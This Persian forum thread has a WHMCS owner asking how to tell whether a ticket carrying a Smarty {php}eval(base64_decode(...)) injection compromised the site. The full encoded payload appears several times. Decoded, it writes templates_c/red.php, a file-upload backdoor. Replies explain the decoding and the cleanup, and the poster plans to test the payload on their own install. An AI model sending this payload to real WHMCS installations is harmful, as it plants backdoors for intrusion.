هک شدن

سلام دوستان ه هکر به کاهدون زده من قبلا یه hmcs داشتم همینطوری الکی بود رو یه هاست الکی همینطوری اتفاقی رفتم تو مدیریتش الان دیدم یه تیکت اومده

کد:

---

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

---

با این موضوع میخوام بدونم الان چطوری بفهمم کدوم فایلها آلوده شده ؟
و چطوری بر طرف کنم ؟

چون میخوام خودم رو hmcs اصلی خودم این کدرو تیکت کنم ببینم قبول میکنه یا نه چون رو این اصلیه همه تنظیمات امنیتی رو انجام دادم

templates_c/red.php

نقل قول:

---

نوشته اصلی توسط php.source

templates_c/red.php

---

ممنون که جواب دادین لطف کردین
فقط یه سوال این مسیر همیشه ثابت یا نه
اگه نه لطف میکنید بفرمایید از کجا باید متوجه شد که مسیر چیه ؟
تو این فایل دنبال چی باید بگردم ؟
خیلی لطف کردید تشکر

---------- Post added at 10:49 PM ---------- Previous post was at 10:44 PM ----------

template_c/red.php
همچین فایلی وجود نداره
تو این فولدر همه فایلها اسمشون مثل اینه
%%C3^C3F^C3FFE86C%%configuredomains.tpl.php

مسیر بسته به نوع سلیقه بچه هکر تغییر میکنه
باید

کد:

---

JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw==

---

که base 64 هست دی کد کنی

نقل قول:

---

نوشته اصلی توسط php.source

مسیر بسته به نوع سلیقه بچه هکر تغییر میکنه
باید

کد:

---

JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw==

---

که base 64 هست دی کد کنی

---

میشه از سایتهایی که کد و دی کد میکنن استفاده کرد یا فرق داره ؟

---------- Post added at 11:05 PM ---------- Previous post was at 11:01 PM ----------

Free online base64 encoder and decoder based on php script

این سایت دکود کرد متوجه شدم
فقط مشکل بعدی اینه که من این red.php رو داخل این فولدر پیدا نکردم

از هر نرم افزاری کهع میخوا استفاده کنی کن
base64 هستش

نقل قول:

---

نوشته اصلی توسط php.source

از هر نرم افزاری کهع میخوا استفاده کنی کن
base64 هستش

---

خوب حالا چطور باید اینو از روی هاستم پاک کنم ؟
من اون فایلرو پیدا نمیکنم یکم راهنمایی میکنید ممنون

هک نشدی دیگه
تمام فایل های داخل این پوشه رو پاک کن بجز index.php

نقل قول:

---

نوشته اصلی توسط php.source

هک نشدی دیگه
تمام فایل های داخل این پوشه رو پاک کن بجز index.php

---

متوجه شدم یعنی اگر هک میشدم این فایل باید ایجاد میشد

مشکل پیش نمیاد ؟
اینا برای چین اصلا ؟

عرض کردم که این یه hmcs الکی بود دوران توفولیت نصب کرده بودم
الان گذری رفتم تو مدیریتش جالب اینه که اصلا این سایت فعال نبود در واقع اصلا هیچی نبود
تازه اون فایل هم که ایجاد نشده پس یعنی هک نشدم
من میخوام این کدرو تو hmcs اصلی خودم تستش کنم ببینم با اینکه همه چیو رعایت کردم سند میشه یا نه
اما اول باید بهمم اگر کار کرد چیکار کنم که سایتم پاکو منزه بشه
و بعد برم دنبال راه جلوگیریش